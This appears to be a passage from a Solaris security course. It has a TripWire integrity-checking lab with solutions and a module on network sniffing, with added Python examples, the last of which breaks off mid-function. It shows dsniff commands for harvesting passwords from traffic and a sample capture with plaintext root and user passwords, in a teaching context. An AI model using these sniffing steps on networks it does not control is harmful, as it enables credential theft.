A typical approach to this problem is to store a copy of the TripWire database offline (for example, on removable media). This copy can regularly overwrite the database stored on the file system. Alternatively, you can compare the secure offline database to the file system copy using MD5 signatures.

This security is also required for the TripWire executables and the tw.config configuration file. Again, this is because the executables and configuration file could be modified by an intruder so that the file system audit does not report certain changes. However, you can easily rebuild the executables and the configuration file once in a while.


Exercise: Using the TripWire Tool

In this exercise, you complete the following tasks:

● Configure, compile, and install the TripWire tool

● Create and update a TripWire database for a set of files

● Generate some TripWire reports

● Modify one or more of the files that TripWire monitors to ensure that the changes are reported

Preparation

Ensure that you have installed the GNU C++ compiler and the make utility.

Task – Installing TripWire

The TripWire download site is listed in “Additional Resources” on page 9-3. A copy of the download file (swatch.tar) is also in the /usr/local/pkg directory.

To install TripWire:

1. Extract the TripWire archive into a subdirectory under /usr/local and read the installation instructions.

2. Edit the makefile to use the install utility in /usr/ucb/install. Search for the pattern ucb in the file, uncomment this line, and comment out the previous line. The lines should now read:

#INSTALL= /usr/bin/install # common
INSTALL= /usr/ucb/install # Pyramid DC/OSx (SVR4)

3. Also edit the makefile to set the following parameters (defined at the top of the file):

DESTDIR=/usr/local/bin
DATADIR=/var/tripwire
MANDIR=/usr/local/man


4. Before installing TripWire you need two directories for the manual pages. If these directories do not exist, enter these commands.

# mkdir /usr/local/man/man5
# mkdir /usr/local/man/man8

Note – If you install TripWire without first creating these directories, the installation process incorrectly creates plain files with these names and fails to install the manual pages. Remove the plain files with the rm command, create the directories as above, and install TripWire again.

5. Follow the instructions in the README file in the TripWire directory to install TripWire. You must update the include/config.h file to make sure that the installation and data directories match the values of the variables in the makefile. Set the appropriate lines in this file to:

#define CONFIG_PATH "/usr/local/tripwire"
#define DATABASE_PATH "/var/tripwire"

Task – Creating a TripWire Configuration

1. Configure the TripWire tool to generate a database for these files and directories:

● /etc/passwd

● /etc/shadow

● /usr/bin

2. Select the following options for all checked files:

a. Check the user, group, permissions, and file size attributes.

b. Use SHA file digest signatures in addition to MD5.

c. Do not check the access time attributes.

3. You must rename the existing tw.config database file you created when you installed TripWire, otherwise the TripWire file checking process takes too long (about 45 minutes for the standard configuration).

4. Generate a database and use the verbose flag to make sure that the correct files and directories are being checked.


Task – Running System Integrity Checks

For this part of the exercise, you make changes to the system and run TripWire to detect those changes. Ask your instructor if you have any questions about the purpose of any of the tests or the outcome of the integrity checks.

To run system integrity checks:

1. Perform an integrity check on the system. What changes were found?

2. Change the comment field for the daemon entry in the /etc/passwd file.

3. Perform an integrity check on the system. Did the TripWire tool report the change?

4. Refer to the TripWire manual page and run the TripWire tool in quiet mode. Record your results here.

Command: _______________________________

Results: _________________________________

5. Update the database to include the change to the /etc/passwd file.

6. Perform an integrity check on the database. Explain the results.

7. Refer to the tw.config manual page and determine which template to use with the log files that are expected to grow.

8. Create a file called my-log.

9. Add an entry to your tw.config file, called configs/tw.check, to monitor your my-log log file.

10. Add text to your log file.

11. Initialize your database.

12. Perform a quiet mode integrity check of the system. Record your results here and explain the results:

____________________________________________________

13. Add text to your log file.

14. Perform a quiet mode integrity check of the system. Record your results here and explain the results:

____________________________________________________


15. Remove some text from your log file.

16. Perform a quiet mode integrity check of the system. Record your results here and explain the results:

____________________________________________________

17. Update the TripWire database.

18. Perform a quiet mode integrity check of the system. Record your results here and explain the results:

____________________________________________________

19. Change text in your log file, taking care not to change the file size.

20. Perform a quiet mode integrity check of the system. Record your results here and explain the results:

____________________________________________________

21. What conclusions can you draw from this result?


Exercise Summary

Discussion – Take a few minutes to discuss what experiences, issues, or discoveries you had during the lab exercise.

● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions

The following are the solutions to the tasks.

Installing TripWire

The TripWire download site is listed in “Additional Resources” on page 9-3. A copy of the download file (Tripwire-1.3.1-1.tar) is also in the /usr/local/pkg directory.

To install TripWire:

1. Extract the TripWire archive into a subdirectory under /usr/local and read the installation instructions.

# cd /usr/local
# tar xvf pkg/Tripwire-1.3.1-1.tar
# cd tw_ASR_1.3.1_src
# more README

2. Edit the ./include/config.h file as follows:

a. Change the location of the configuration and database files from:

#define CONFIG_PATH "/usr/local/bin/tw"
#define DATABASE_PATH "/var/tripwire"

to

#define CONFIG_PATH "/usr/local/tripwire"
#define DATABASE_PATH "/var/tripwire"

b. Create a directory for the configuration file and copy the default configuration file to the new directory. (You will overwrite this configuration later in this exercise.)

# mkdir -p /usr/local/tripwire /var/tripwire
# cp configs/tw.conf.sunos5 /usr/local/tripwire/tw.config

The tw.config file contains a list of all files and directories that are checked and verified by TripWire.

c. Edit the makefile and use the install utility in /usr/ucb/install. Search for the pattern ucb in the file, uncomment this line, and comment out the previous line. The lines should now read:

#INSTALL= /usr/bin/install # common
INSTALL= /usr/ucb/install # Pyramid DC/OSx (SVR4)

3. Also edit the makefile to set the following parameters (defined at the top of the file):

DESTDIR=/usr/local/bin
DATADIR=/var/tripwire
MANDIR=/usr/local/man

4. Before installing TripWire you need two directories for the manual pages. If these directories do not exist, enter these commands:

# mkdir /usr/local/man/man5
# mkdir /usr/local/man/man8

Note – If you install TripWire without first creating these directories, the installation process incorrectly creates plain files with these names and fails to install the manual pages. Remove the plain files with the rm command, create the directories as above, and install TripWire again.

5. Build and install TripWire with:

# make install

If this fails, correct the config.h file and/or Makefile and run the command:

# make clean

Before re-running the make install command, verify that the compilation was successful.

# make test

6. Verify that the tripwire executable is in your path.

# tripwire -version
Tripwire(tm) ASR (Academic Source Release) 1.3.1
File Integrity Assessment Software
(c) 1992, Purdue Research Foundation, (c) 1997, 1999 Tripwire
Security Systems, Inc. All Rights Reserved, Use Restricted to
Authorized Licensees.

Creating a TripWire Configuration

1. Configure the TripWire tool to generate a database for these directories:

● /etc/passwd

● /etc/shadow

● /usr/bin

2. Select the following options for all checked files:

a. Check the user, group, permissions, and file size attributes.

b. Use file digest algorithm SHA signatures in addition to MD5.

c. Do not check the access time attributes.

3. Rename the existing tw.config database file you created when you installed TripWire.

# cd /usr/local/tripwire
# mv tw.config sunos5.conf

4. Edit a new configuration file:

# vi tw.config

5. Add the following to the file:

/etc/passwd +ugps17-a2345689
/etc/shadow +ugps17-a2345689
/usr/bin +ugps17-a2345689

6. Generate a database and use the verbose flag to make sure that the correct files and directories are being checked.

# tripwire -v -initialize

7. Copy the database to the default TripWire database directory location (/var/tripwire in this example).

# cp databases/tw.db_grommit /var/tripwire

Running System Integrity Checks

For this part of the exercise you make changes to the system and run TripWire to detect those changes. Ask your instructor if you have any questions about the purpose of any of the tests or the outcome of the integrity checks.

1. Perform an integrity check on the system.

# tripwire -v

What changes were found?

No changes should have been found or reported.

2. Change the comment field for the daemon entry in the /etc/passwd file.

Change the entry to something like this:

daemon:x:1:1: TripWire was here :/:

3. Perform an integrity check on the system.

# tripwire -v

Did TripWire report the change?

Yes, TripWire reported that /etc/passwd had been modified.

### changed: -rw-r--r-- root 431 May 7 18:23:14 2001 /etc/passwd
### Phase 5: Generating observed/expected pairs for changed files
###
### Attr        Observed (what it is)         Expected (what it should be)
### =========   =============================  =============================
/etc/passwd     st_size: 431                   414
...

4. Refer to the TripWire manual page and run the TripWire tool in quiet mode. Record your results here.

# tripwire -q
changed: -rw-r--r-- root 414 May 7 18:28:41 2001 /etc/passwd

5. Update the database to include the change to the /etc/passwd file.

# tripwire -v -update /etc/passwd
# cp databases/tw.db_grommit /var/tripwire

6. Perform an integrity check on the database.

# tripwire -v

What did TripWire report?

No changes should have been found or reported.

7. Refer to the tw.config manual page and determine which template to use with log files that are expected to grow.

The > template reports when the file checked is smaller than the last recorded size. This function also reports if someone removes entries from a log file.

8. Create a file called my-log.

# touch /export/home/my-log

9. Add an entry to your tw.config file to monitor your my-log log file.

# vi /usr/local/tripwire/tw.config

10. Add the following to the file:

/export/home/my-log >

The > flag is the log file template described earlier.

11. Add text to your log file.

# echo Hey there >> /export/home/my-log
# cat /export/home/my-log
Hey there
#

12. Initialize your database.

# tripwire -v -initialize
# cp databases/tw.db_grommit /var/tripwire

13. Perform a quiet mode integrity check of the system.

# tripwire -q

Record your results here.

Nothing should be reported.

Explain the results.

No changes have been made to the database.

14. Add text to your log file.

# echo Hey there >> /export/home/my-log
# cat /export/home/my-log
Hey there
Hey there
#

15. Perform a quiet mode integrity check of the system.

# tripwire -q

Record your results here.

Nothing should be reported.

Explain the results.

The > template only reports if the file is smaller than that recorded in the database.

16. Remove some text from your log file.

# vi /export/home/my-log
# cat /export/home/my-log
Hey there
Hey
#

17. Perform a quiet mode integrity check of the system.

# tripwire -q

Record your results here.

Nothing should be reported.

Explain the results.

The file is still larger than the image in the database. The > template only reports if the file is smaller.

18. Update the TripWire database.

# tripwire -update /export/home/my-log

19. Copy the database to the expected directory.

# cp databases/tw.db_grommit /var/tripwire

20. Perform a quiet mode integrity check of the system.

# tripwire -q

Record your results here.

Nothing should be reported.

Explain the results.

The > template reports only if the file size is smaller than when it was last checked.

21. Change text in your log file, taking care to not change the file size.

# vi /export/home/my-log
# cat /export/home/my-log
Way hello
Day

22. Perform a quiet mode integrity check of the system.

# tripwire -q

Record your results here.

Nothing should be reported.

Explain the results.

The file size remained the same, even though the data was completely changed.

23. What conclusions can you draw from this result?

The > template is open to exploitation: crackers who know that a log file is monitored by TripWire with this template can cover their tracks by changing or adding data instead of removing log entries.
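The result of steps 12 through 22 can be reproduced with a small model. This is an added illustration, not TripWire's code: check_grow_template() models the > template as the exercise describes it (report only a shrinking file), and check_append_only() is a stricter growing-log check added here (not a TripWire template) that also verifies the recorded prefix of the log still hashes the same, so a same-size rewrite is reported. The log contents are constructed to match the exercise.

```python
from __future__ import annotations

import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class Record:
    """One database entry (a constructed stand-in for a tw.db record)."""
    size: int
    md5: str   # signature 1 in the exercise's +ugps17 flags
    sha1: str  # signature 7


def snapshot(data: bytes) -> Record:
    """Record size and both digests, as 'tripwire -initialize' or '-update' would."""
    return Record(len(data),
                  hashlib.md5(data).hexdigest(),
                  hashlib.sha1(data).hexdigest())


def check_grow_template(rec: Record, data: bytes) -> list[str]:
    """Model of the '>' template as the exercise describes it:
    only a file that is smaller than the recorded size is reported."""
    if len(data) < rec.size:
        return [f"changed: st_size {len(data)} < {rec.size}"]
    return []


def check_append_only(rec: Record, data: bytes) -> list[str]:
    """Stricter growing-log check (added here, not a TripWire template).
    The file may only grow, AND its first rec.size bytes must still hash to
    the recorded digests, so in-place edits are caught even at equal size."""
    findings = []
    if len(data) < rec.size:
        findings.append(f"changed: st_size {len(data)} < {rec.size}")
    head = data[:rec.size]
    if (hashlib.md5(head).hexdigest() != rec.md5
            or hashlib.sha1(head).hexdigest() != rec.sha1):
        findings.append("changed: recorded prefix altered (content rewritten)")
    return findings


# Constructed contents of /export/home/my-log at each step of the exercise.
LOG_V1 = b"Hey there\n"             # step 11: initial text
LOG_V2 = b"Hey there\nHey there\n"  # step 14: text appended
LOG_V3 = b"Hey there\nHey\n"        # step 16: text removed, still bigger than V1
LOG_V4 = b"Way hello\nDay\n"        # step 21: rewritten, same size as V3


def run_exercise() -> dict[str, tuple[list[str], list[str]]]:
    """Replay steps 12-22; each entry is (grow-template report, append-only report)."""
    db = snapshot(LOG_V1)                      # step 12: -initialize
    out = {}
    out["append"] = (check_grow_template(db, LOG_V2), check_append_only(db, LOG_V2))
    out["remove"] = (check_grow_template(db, LOG_V3), check_append_only(db, LOG_V3))
    db = snapshot(LOG_V3)                      # step 18: -update
    out["rewrite"] = (check_grow_template(db, LOG_V4), check_append_only(db, LOG_V4))
    return out


if __name__ == "__main__":
    for step, (grow, strict) in run_exercise().items():
        print(f"{step:8s} '>' template: {grow or 'nothing reported'}")
        print(f"{'':8s} append-only:  {strict or 'nothing reported'}")
```

The rewrite in step 21 is invisible to the size-only template but is reported by the prefix check, which is the conclusion the exercise asks you to draw.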

Module 10

Attacking Network Data

Objectives

Upon completion of this module, you should be able to:

● Describe the term “network sniffing”

● Describe use of common sniffer tools

● Describe common network service attacks

● Describe network DoS attacks

Relevance

Discussion – The following questions are relevant to understanding attacks on network data:

● Can you restrict access to your network:

    ● So that unauthorized systems cannot connect to the network?

    ● So that there is no unauthorized software on authorized systems?

● Does your network extend to a public telecommunications backbone (for example, Internet access)?

● Do any of your users send unencrypted user names and passwords across the network?

Hint: If your users use telnet, ftp, Simple Network Management Protocol (SNMP), Post Office Protocol 3 (POP3), HTTP, and other TCP/IP services without using secure sockets, then they are sending plain text passwords regularly.

Additional Resources

Additional resources – The following references provide additional information on the topics described in this module:

● Schneier, Bruce. Secrets & Lies. John Wiley & Sons, 2000.

● Scambray, McClure, Kurtz. Hacking Exposed. Osborne McGraw-Hill, 2001.

● Garfinkel, Simson, and Spafford, Gene. Practical UNIX & Internet Security. O’Reilly & Associates, Inc. 1996.

● Online manual pages for snoop(1).

● Solaris OE Answerbook 2.

● The dsniff utility ported to Solaris OE 2.x, [http://www.sunfreeware.com]

Network Sniffing

A network sniffer is a program or special device which monitors your network and collects some or all of the data that it finds. The term sniffer is used because sniff was the name of the original program developed to analyze network traffic (the sniff program is owned and marketed by Network Associates, Inc.).

Sniffers were developed to enable engineers to debug networking problems. They provide packet analysis capabilities, letting the engineer view the data in its raw form (streams of octets). Modern sniffers interpret standard protocols and provide a user-readable summary of data gathered from the network.

Code 10-1 shows what output from a sniffer can look like.

Code 10-1 Sniffer Output

192.168.1.1 -> 192.168.1.2 length: 124 TELNET R port=1239

   0: 0001 02de 3436 0800 20c1 0efe 0800 4500   ....46.. .. ..E.
  16: 006e 9a34 4000 3c06 2102 c0a8 0101 c0a8   .n.4@.<.!.......
  32: 0102 0017 04d7 743b f92a 01c5 f61f 5018   ......t;.*....P.
  48: 60f4 9c6c 0000 6c6f 6361 6c2e 6373 6872   ..l..local.cshr
  64: 6320 2020 206c 6f63 616c 2e6c 6f67 696e   c    local.login
  80: 2020 2020 6c6f 6361 6c2e 7072 6f66 696c       local.profil
  96: 6520 206d 6b66 7470 2020 2020 2020 2020   e  mkftp
 112: 2020 6e73 6d61 696c 0d0a 2320              nsmail.. #

Code 10-1 is output from the standard Solaris OE snoop utility, which includes a complete hexadecimal dump of the packet data after a summary line. The summary tells you that this is a telnet packet from host 192.168.1.1 to 192.168.1.2.

This output is a listing from the ls command. The packet data starts at offset 54 (after the 14-byte Ethernet, 20-byte IP, and 20-byte TCP headers), and at offset 120 there is a carriage return and line feed (CR and LF) pair (hex codes 0D/0A), followed by a shell prompt (#).
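The decoding described above can be automated. The following is an added example (not part of the course or of snoop): it rebuilds the packet bytes from the Code 10-1 hex dump, walks the Ethernet, IPv4 and TCP headers to find the payload offset, and recovers the plaintext the telnet server sent, which is what any sniffer on the segment also sees.

```python
import re
import struct

# The Code 10-1 dump from this page (snoop -rSx 0 output), used as the sample input.
SNOOP_DUMP = """\
   0: 0001 02de 3436 0800 20c1 0efe 0800 4500   ....46.. .. ..E.
  16: 006e 9a34 4000 3c06 2102 c0a8 0101 c0a8   .n.4@.<.!.......
  32: 0102 0017 04d7 743b f92a 01c5 f61f 5018   ......t;.*....P.
  48: 60f4 9c6c 0000 6c6f 6361 6c2e 6373 6872   ..l..local.cshr
  64: 6320 2020 206c 6f63 616c 2e6c 6f67 696e   c    local.login
  80: 2020 2020 6c6f 6361 6c2e 7072 6f66 696c       local.profil
  96: 6520 206d 6b66 7470 2020 2020 2020 2020   e  mkftp
 112: 2020 6e73 6d61 696c 0d0a 2320              nsmail.. #
"""

OFFSET_LINE = re.compile(r"^\s*(\d+):\s*(.*)$")
HEX_WORD = re.compile(r"^[0-9a-f]{2}(?:[0-9a-f]{2})?$", re.I)


def parse_snoop_dump(text: str) -> bytes:
    """Rebuild packet bytes from 'offset: up to 8 hex words   ascii' lines.
    Only the hex column is trusted; reading stops at the first token that is
    not a 2- or 4-digit hex word, or after 8 words, so the ASCII column is skipped."""
    pkt = bytearray()
    for line in text.splitlines():
        m = OFFSET_LINE.match(line)
        if not m:
            continue
        if int(m.group(1)) != len(pkt):
            raise ValueError(f"offset {m.group(1)} does not follow {len(pkt)} bytes")
        for tok in m.group(2).split()[:8]:
            if not HEX_WORD.match(tok):
                break
            pkt += bytes.fromhex(tok)
    return bytes(pkt)


def decode_tcp_payload(pkt: bytes) -> tuple[dict, bytes]:
    """Walk Ethernet -> IPv4 -> TCP headers; return (summary, payload bytes)."""
    if len(pkt) < 14 or struct.unpack("!H", pkt[12:14])[0] != 0x0800:
        raise ValueError("not an IPv4 packet")
    ip = pkt[14:]
    ihl = (ip[0] & 0x0F) * 4                     # IP header length in bytes
    total_len = struct.unpack("!H", ip[2:4])[0]  # IP total length (header + data)
    if ip[9] != 6:
        raise ValueError("not TCP")
    tcp = ip[ihl:]
    sport, dport = struct.unpack("!HH", tcp[:4])
    doff = (tcp[12] >> 4) * 4                    # TCP data offset in bytes
    payload_off = 14 + ihl + doff
    summary = {
        "src": ".".join(str(b) for b in ip[12:16]),
        "dst": ".".join(str(b) for b in ip[16:20]),
        "sport": sport, "dport": dport,
        "payload_offset": payload_off, "length": len(pkt),
    }
    return summary, pkt[payload_off:14 + total_len]


def summarize(dump: str = SNOOP_DUMP) -> dict:
    """Parse the dump and add the CR/LF position and the recovered plaintext."""
    pkt = parse_snoop_dump(dump)
    info, payload = decode_tcp_payload(pkt)
    info["crlf_offset"] = pkt.find(b"\r\n")
    info["text"] = payload.decode("ascii", errors="replace")
    return info


if __name__ == "__main__":
    s = summarize()
    print(f"{s['src']}:{s['sport']} -> {s['dst']}:{s['dport']} "
          f"payload at {s['payload_offset']}, CR/LF at {s['crlf_offset']}")
    print(repr(s["text"]))
```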

Implications of Sniffing

Network sniffing allows potential access to all the data transmitted on the network. With modern client–server–based architectures, especially with the dominance of Web-based services, a network sniffer can collect large amounts of data in a very short amount of time.

Discussion – Consider the network you have in your organization and the type of data that is transmitted across it. For example, do you work from a PC and administer your Solaris OE servers using telnet (or X-Windows)? If so, every character you send and receive is transmitted, unencrypted, across the network. Do you ever use the su command to log in as the root user? If so, you might have just handed your root user password over to an intruder.

How Sniffers Work

A network interface card (NIC) can usually only pick up traffic addressed to itself, or broadcast and multicast packets. To sniff the network, the card must be put into a special mode, called promiscuous mode, where it picks up all network traffic.

All network cards support promiscuous mode and some operating systems can provide a means for programs to switch the card into this mode. The Solaris OE does support the ability to switch a network card into this mode but restricts access to the physical device (/dev/hme) to the root user. PC-based systems running Microsoft Windows 95/98/ME normally cannot deny user access to low-level hardware devices, which allows any PC user to run sniffing tools.

Because of the security implications of promiscuous mode, some network cards can have promiscuous mode disabled in the firmware (effectively preventing sniffers from working). However, the firmware can be modified to re-enable promiscuous mode using standard tools provided by the network card manufacturer.

Detecting Sniffers

Detecting whether your network is being sniffed is almost impossible. A few tools, such as cpm (check promiscuous mode) from Carnegie Mellon University (ftp://infor.cert.org/pub/tools), can detect if a network interface is in promiscuous mode. However, this tool must run on the host concerned.

General logging mechanisms show network sniffers using up inordinate amounts of network I/O (a very high proportion of input to output), and network sniffers often generate large data capture files over time.

Regular monitoring for suspicious activity can help detect sniffing on a host. However, an intelligent intruder can usually hide the sniffer so that it does not show up in the system logging and monitoring activities.

Detecting sniffing on the network itself is currently in its infancy. Two tools that detect sniffing on a network are:

● AntiSniff – Runs on Microsoft Windows only. Available from Security Software Technologies, Inc. http://www.securitysoftwaretech.com/antisniff/

● Sentinel – Runs on UNIX. Available from http://www.packetfactory.net/Projects/Sentinel

Defending Against Network Sniffers

There is only one sure way to defend against network sniffing, and that is to encrypt all network traffic. Technologies like Secure Sockets Layer (SSL) and Internet Protocol Security (IPSec) are low-level protocol encryption tools. You can achieve higher-level encryption by using applications which encrypt their data. Tools like Secure Shell (SSH) provide a better alternative than unencrypted tools like telnet and remote login with the rlogin and rsh commands.

Network Sniffing Tools

There are many sniffing tools on the market. Some are expensive and require specialized equipment. In fact, all LAN analyzers are specialized network sniffers.

There are many low-cost or free software products for UNIX and Microsoft Windows platforms which do a good job of network sniffing. They might drop an occasional packet of data here and there, but they can still collect a large amount of data.

The Solaris 8 OE comes with its own sniffer utility called snoop. There is also a freeware, simple-to-use product called dsniff that can harvest passwords from a network. Harvesting data means collecting only the data you are interested in while discarding the rest.

Note – Many other tools are available on the market. The tcpdump utility is popular and widely ported [http://www.tcpdump.org].

The snoop Utility

The Solaris OE comes with a basic network sniffer, /usr/sbin/snoop (etherfind on SunOS 4). It can be invoked by anyone, but access to the network device is restricted to the root user, effectively making it a superuser-only utility.

However, if an intruder breaks in and assumes the root user identity on any Solaris OE system on your network, the intruder can run snoop to capture network traffic, which might allow the intruder to break into other systems.

By default, snoop displays a summary of all packet data sniffed:

# snoop
Using device /dev/hme (promiscuous mode)
grommit -> wallace TELNET C port=1079
wallace -> grommit TELNET R port=1079 Using device /dev/hm
grommit -> wallace TELNET C port=1079
wallace -> grommit TELNET R port=1079 grommit -> wall
grommit -> wallace TELNET C port=1079
wallace -> grommit TELNET R port=1079 wallace -> grom
grommit -> wallace TELNET C port=1079

The protocol is identified together with the host names (if known) and the first few bytes of text in the packet (if the data is readable text).

The snoop output is usually redirected to a file for later analysis. Sending output to the screen slows down the operation of the snoop utility, which can cause snoop to miss (or drop) packets of data. Redirecting the data to a file introduces a lower I/O overhead than sending data directly to the screen. Redirecting the data to a file also avoids recursively collecting the data sent to the screen when using the telnet command (as the output above shows, where the telnet packets carry snoop's own output).

The snoop Options

Collect raw network data with snoop using the -o option:

# snoop -o /tmp/snooped

All data is saved to this file, so the file must be on a disk with sufficient free space. Stop the data collection by killing the snoop utility with Control-C or the kill command.

To examine the results of a data capture, use the -i option with the name of the raw data file:

# snoop -i /tmp/snooped

The snoop utility has many options and capabilities for filtering or displaying the data, which are fully described in the manual pages. Table 10-1 shows some of the more commonly used options.

Table 10-1 The snoop Utility Options

Option              Usage

-N                  Creates a names file when capturing data, which maps IP addresses to host names (same format as /etc/hosts).

-n filename         Uses the named file for IP address resolution instead of using the /etc/hosts file and DNS.

-r                  Does not map network addresses into host names, which avoids generating DNS traffic while capturing data. You can use a names file (see the -n and -N options) for name lookup.

-S                  Includes the packet size on the summary line.

-V                  Verbose summary mode, which includes additional summary data for each protocol layer in the captured packet.

-v                  Verbose mode, which includes extra header information in the summary line.

-x start[,length]   Includes the packet data in the output, starting from the given offset for the specified number of octets (or the entire packet if no length is specified).

For example, Code 10-1 on page 10-5 used the following command line:

# snoop -rSx 0

The snoop Packet Filters

The snoop command line uses optional expressions to filter the data beingviewed. Some common optional expressions are:

● Only include packets to and from the named host:

# snoop host hostname

● Only include packets to and from the specified address (which can be a dotted decimal IP address or a colon-separated 8-byte Ethernet address):

# snoop address
# snoop net address

● Prefix a host or net address with to or from to view incoming or outgoing packets.

# snoop to host hostname
# snoop from address

● Only include packets for the specified port number, which can be a number (such as 23) or an entry from the /etc/services file (such as the telnet service):

# snoop port service

Several other filtering options require more knowledge of the network packet structure. Read the snoop manual page for all of the available command-line parameters.

You can make filtering more selective by combining options and expressions with the logical operators and, or, and not (or !).

● To select only ftp packets use:

# snoop port ftp

● To monitor all incoming telnet data to the host grommit use:

# snoop port telnet and host grommit

● To look for SNMP between wallace and grommit and show the data packet use:

# snoop -x 0 port snmp and wallace and grommit

The dsniff Utility

The dsniff utility is a network and password sniffer that obtains passwords off of the network. It can be downloaded from the Sun Freeware Web site.

The dsniff utility handles ftp, telnet, SMTP, HTTP, POP, SNMP, LDAP, Rlogin, NIS, X11, Symantec pcAnywhere, Microsoft SMB, Oracle SQL*Net, Sybase, Microsoft SQL protocols, and many other protocols.

The dsniff utility automatically detects and minimally parses each application protocol, only saving the interesting pieces of information. For example, with the telnet command, the dsniff utility saves data sent from the client to the server (in other words, the dsniff utility saves what the user types in).

The dsniff utility can save its data to a Berkeley DB database format data file for later analysis, or it can write the data to standard output.

Running the dsniff Utility

To run dsniff and save the data to a file called dsniffed , type:

# dsniff -w dsniffed

To read this data file, type:

# dsniff -r dsniffed

The dsniff utility has additional command line options which you can use if you have special network requirements. Like the snoop utility, the dsniff utility allows filtering expressions on its command line. Some of the useful ones are:

● Only include packets to and from the named host:

# dsniff host hostname

● Only include packets to and from the specified address, which can be a dotted decimal IP address or a colon-separated 8-byte Ethernet address:

# dsniff net address

● Prefix a host or net address with to or from to view incoming or outgoing packets:

# dsniff to host hostname
# dsniff from host address

● Only include packets for the specified port number, which can be a number (such as 23) or an entry from /etc/services (such as the telnet service):

# dsniff port service

As with the snoop utility, there are several other filtering options, and you can make the filtering more selective by combining the expressions with the logical operators and, or, and not (or !).

By default, the dsniff utility captures all the interesting data it sees. This can be a lot of information to examine, so you should filter the data you want to save by specifying the host or protocol that you are interested in. The dsniff utility captures data until you stop the program using Control-C or the kill command (if you run the dsniff utility in the background).

The dsniff utility captures an entire TCP session, so it only saves data if the connection is established and torn down while the dsniff utility is running (that is, you do not capture data if someone is already logged in using the telnet command when you start running the dsniff utility).

Code 10-2 shows how to use the dsniff utility to examine telnet data for the host wallace.

Code 10-2 Using the dsniff Utility

1  # dsniff -w dsniffed port telnet and host wallace&
2  [1] 3088
3  <continue working>
4  # kill %1
5  # dsniff -r dsniffed
6  listening on hme0 [port telnet and host wallace]
7  trigger_tcp: decoding port 23 as telnet
8  -----------------
9  04/26/01 15:21:35 tcp 192.168.1.2.1090 -> wallace.23 (telnet)
10 alice
11 w0nder
12 su
13 s3cr3t
14 passwd eve
15 password
16 password
17 passwd -f eve
18 exit
19 exit

Code 10-2 shows everything typed in for one telnet session. At line 10, alice supplies the login name and then the password (“w0nder” on line 11). The first action that alice takes is the su command to log in as the root user, supplying the root user password (s3cr3t). alice then resets eve’s password to the string password.

If an intruder were running the dsniff utility on your network, the intruder would now be in possession of the passwords for the root user account as well as two non-administration accounts. The intruder is likely to be installing back doors on wallace while continuing to run the dsniff utility to try to compromise security on the rest of your systems.

Discussion – Now that you know about the dsniff utility, would you allow users on your network to use the telnet command? What alternatives are there?

Network Service Attacks

Network attacks probably form the majority of attacks on a system in a modern IT configuration. Nearly every computer is connected to a network, and many networks are connected to the Internet.

As an administrator, you have no control over the Internet. All you can do is install defensive measures at the boundary where your network connects to the Internet. These measures involve firewalls, proxy servers, demilitarized zones (DMZs), and other techniques.

Your network is vulnerable even if you have taken steps to prevent unauthorized systems and users from tapping into the network infrastructure. When intruders have access to your network, they can begin to attack the systems on the network.

Many network attacks can only be undertaken by someone with a goodknowledge of the low-level protocols. This module discusses somenetwork attacks which can be undertaken by an intruder with only asmall amount of networking knowledge.


Packet Replay Attacks

One form of attack that network sniffing can lead to is the packet replay attack. In this attack, packets of data which have been sniffed from the network are replayed back to a server, usually with a different source address, trying to fool the server into providing information. Replay attacks are often used to try to obtain Kerberos tickets granting access to other network services.

Every TCP/IP packet has a sequence number which increments as packets are sent. If the initial sequence number is predictable, an intruder can work out the next valid sequence number and spoof network packets that the server accepts as part of the connection.


In the Solaris OE, the file /etc/default/inetinit can set different initial sequence number generation parameters using the TCP_STRONG_ISS variable. Possible values are shown in Table 10-2.

You are strongly advised to set the parameter value to 2 to guard against replay attacks.

# grep TCP_STRONG /etc/default/inetinit
TCP_STRONG_ISS=2

Table 10-2 Possible Values of the TCP_STRONG_ISS Variable

Value   Meaning

0       Old-fashioned, sequential initial sequence number generation

1       Improved sequential generation, with random variance in increment

2       RFC 1948 sequence number generation, unique per connection ID
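The difference between the three TCP_STRONG_ISS settings can be made concrete with a small model of each generator. The following Python is an added example, not from the course or from the Solaris source: the 4-microsecond timer is a plain integer, the boot secret is a constructed placeholder, and MD5 stands in for the hash F of RFC 1948. A helper that reads the setting out of the text of /etc/default/inetinit (ignoring commented-out lines) is included so the check can be scripted.

```python
import hashlib
import random

# Constructed per-boot secret. In RFC 1948 the host picks this at boot and never
# reveals it; the value here is a placeholder so the example runs offline.
BOOT_SECRET = b"constructed-boot-secret-not-real"
MASK32 = 0xFFFFFFFF


def isn_sequential(ticks):
    """TCP_STRONG_ISS=0: the ISN is the 4-microsecond timer itself.
    Anyone who observes one ISN and knows the elapsed time knows the next one."""
    return ticks & MASK32


def isn_random_increment(ticks, rng=None):
    """TCP_STRONG_ISS=1: timer plus a random variance in the increment.
    The guess is no longer exact, but it is confined to a small range."""
    rng = rng or random.Random()
    return (ticks + rng.randrange(0, 1 << 16)) & MASK32


def isn_rfc1948(ticks, local_addr, local_port, remote_addr, remote_port, secret=BOOT_SECRET):
    """TCP_STRONG_ISS=2: ISN = M + F(connection_id, secret), as RFC 1948 describes.
    F hashes the connection 4-tuple with the secret and is truncated to 32 bits, so every
    connection ID gets its own offset from the timer M that outsiders cannot relate to others."""
    conn_id = f"{local_addr}:{local_port}|{remote_addr}:{remote_port}".encode()
    offset = int.from_bytes(hashlib.md5(conn_id + secret).digest()[:4], "big")
    return (ticks + offset) & MASK32


def naive_prediction(observed_isn, ticks_elapsed):
    """What an observer who assumes sequential ISNs predicts for a later connection."""
    return (observed_isn + ticks_elapsed) & MASK32


def parse_tcp_strong_iss(inetinit_text):
    """Return the TCP_STRONG_ISS value from the text of /etc/default/inetinit.
    Comment lines are ignored and the last assignment wins; None if the variable is unset."""
    value = None
    for line in inetinit_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, val = line.partition("=")
        if sep and key.strip() == "TCP_STRONG_ISS":
            value = int(val.split("#")[0].strip())
    return value


def demo():
    t0, t1 = 1_000_000, 1_000_250  # two connections 1 ms apart (250 ticks of 4 us)
    server = ("192.168.1.1", 25)
    # Mode 0: the observer's guess for the second connection is exact.
    exact0 = naive_prediction(isn_sequential(t0), 250) == isn_sequential(t1)
    # Mode 2: the observer sees host .107's ISN; the same guess for host .108's connection
    # misses, even though the timer advanced by the same 250 ticks.
    seen = isn_rfc1948(t0, *server, "192.168.1.107", 40000)
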